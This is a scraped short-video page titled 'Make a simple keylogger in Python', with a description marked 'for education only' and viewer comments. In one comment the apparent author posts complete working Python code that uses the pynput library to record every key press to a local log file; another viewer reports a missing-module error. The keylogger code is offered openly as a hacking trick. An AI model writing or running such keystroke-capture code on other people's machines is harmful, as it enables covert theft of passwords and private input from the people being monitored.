Make a simple keylogger in Python!⚠️ #tutorial #hacker #ai #programming #education #tech #shorts

preview_player
Показать описание
For education only!!!
Full code here:

def reader(file, key):
with open(file, "a") as f:

For more tricks subscibe! Thx!❤️
Рекомендации по теме
Комментарии
Автор

That say to me "No module named pynput"

Colza_
Автор

Full code here:

from pynput.keyboard import Listener

def reader(file, key):
with open(file, "a") as f:
f.write(str(key) + "\n")

with Listener(on_press=lambda key: reader("log.txt", key)) as listener:
listener.join()


For more tricks subscibe! Thx!❤️

SwiftCode_ofi
join shbcf.ru